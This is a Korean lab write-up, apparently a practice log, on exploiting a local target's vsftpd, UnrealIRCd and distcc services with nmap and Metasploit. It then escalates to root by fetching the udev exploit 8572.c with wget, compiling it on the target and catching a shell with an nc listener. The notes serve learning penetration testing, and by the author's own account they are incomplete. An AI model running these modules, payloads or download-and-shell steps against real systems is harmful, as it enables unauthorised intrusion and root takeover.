Metasploit 포트 별 시스템 해킹 실습 (feat. daemon => root전환)
21번 포트 (vsFTP)
1. nmap 이용해 공격 대상의 취약 포트를 찾는다.
sudo nmap -A 192.168.5.130
21번 포트 (vsFTP 2.3.4)
2. nmap에서 관련 취약점 스크립트가 존재하는지 확인
21번 포트의 VSFTP 취약점을 파악하는 스크립트 활용
$sudo nmap --script=ftp-vsftpd-backdoor.nse 192.168.5.130 -p 21
3. Metasploit에 해당 스크립트 장착
use exploit/unix/ftp/vsftpd_234_backdoor
info tap => set RHOST 공격 대상 IP 입력
show payloads => 현재 장착된 페이로드 확인 / 해당 포트는 별도의 페이로드 없어도 된다.
4. Exploit
6667번 포트 (Unrealirc 8.2.3.1)
1. nmap이용 취약 포트 찾기
2. 6667번 포트 집중분석
sudo nmap -A 192.168.5.130 -p 6667
3. Unreal3.2.8.1. 구글 검색
4. Metasploit에 스크립트 장착 및 Exploit
info => RHOST 공격 대상 IP 지정 (Required=yes)
set RHOST 192.xxx.5.130
show payloads => 제일 상단의 bind_perl로 설정
set payloads cmd/unix/bind_perl
3632번 포트 (DistCC) _ Deamon=> Root
1. nmap이용 취약 포트 찾기
2. nmap스크립트를 이용 취약점 확인
3. distcc 구글 검색
4. Metasploit에 스크립트 장착 및 Exploit
Daemon에서 Root로 바꾸기
exploit연결 후 확인되는 계정은 root가 아닌 daemon 뿐이었다. root보다는 제한된 권한에다 /tmp 경로를 벗어나지 못해 root로 바꿀 방법을 찾다가, 한 유튜버의 영상을 보고 따라 했더니 root계정이 되었다.
위에서 말하는 'udev'전환 과정은 생각보다 복잡했다. 내용을 모두 적기엔 길고 모르는 내용이 너무 많아 영상을 따라 무지성으로 따라 했다. 아래 몇 가지를 요약했지만, 누락된 내용이 많기 때문에 영상 8분 40초부터 참고하길 권장한다.
- /usr/share/exploitdb/platforms/linux/local/ 경로의 8572.c 파일을 exploit 대상 서버로 옮긴다.
- 옮기는 과정은 apache2를 통해 웹으로 전달, wget으로 8572.c다운
- 공격 대상 서버에서 8572.c 파일 gcc로 컴파일, host의 5555포트와 연결시킨다.
- nc -lvnp 5555 // 공격대상 서버에서 실행파일을 실행하면 exploit결과를 원격으로 확인 가능하다.
https://www.youtube.com/watch?v=DoUZFHwZntY&t=520s